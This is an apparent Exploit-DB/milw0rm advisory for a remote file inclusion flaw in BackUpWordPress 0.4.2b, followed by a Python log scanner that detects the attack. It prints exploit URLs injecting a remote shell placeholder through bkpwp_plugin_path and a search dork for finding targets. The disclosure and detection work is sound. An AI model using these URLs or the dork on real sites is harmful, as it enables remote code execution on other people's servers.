Vendor: BackUpWordPress
By: S.W.A.T.
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: BackUpWordPress
Affected Version From: 0.4.2b
Affected Version To: 0.4.2b
Patch Exists: NO
2007

BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability

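The vulnerability allows an attacker to include arbitrary files from a remote server: the plugin's Archive scripts build a require_once path from $GLOBALS['bkpwp_plugin_path'], and that value can be supplied in the request's query string.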

Mitigation:

Update to a version higher than 0.4.2b

Exploit-DB raw data:

--------------------------------- [ Xmors Underground Team ! ] --------------------------------------

Title : BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------
#Author: S.W.A.T.


#cont@ct: svvateam@yahoo.com

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"

--------------------------------------------------------------------------------



--------------------------------- [http://www.xmors.com ] --------------------------------------

# milw0rm.com [2007-11-01]
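
Detection side of the advisory above, as an added example that is not part of the original advisory or of the plugin: a Python check that flags access-log requests to PHP files under /plugins/BackUp/ carrying the bkpwp_plugin_path parameter. The combined log format, the /wp-content prefix, the function names and the example.org hosts in the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter name and plugin directory come from the advisory text.
PARAM = "bkpwp_plugin_path"
PLUGIN_DIR = "/plugins/backup/"

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme points the include path off-host.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify(line):
    """Return None, 'param-set' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower()
    if PLUGIN_DIR not in path or not path.endswith(".php"):
        return None
    # parse_qs percent-decodes, so encoded schemes are caught as well.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(SCHEME_RE.match(v) for v in values):
        return "remote-include"
    return "param-set"  # no legitimate client sets this, so still worth review

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2007:10:00:00 +0000] "GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://files.example.org/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Nov/2007:10:00:05 +0000] "GET /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http%3A%2F%2Ffiles.example.org%2Fx.txt%3F HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Nov/2007:10:00:09 +0000] "GET /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=/var/www/ HTTP/1.1" 500 0',
    '192.0.2.13 - - [01/Nov/2007:10:00:12 +0000] "GET /wp-content/plugins/BackUp/Archive.php HTTP/1.1" 200 0',
    '192.0.2.14 - - [01/Nov/2007:10:00:15 +0000] "GET /index.php?p=12 HTTP/1.1" 200 8100',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

Any hit is worth investigating, since the parameter is an internal plugin variable that ordinary traffic never sets from the query string.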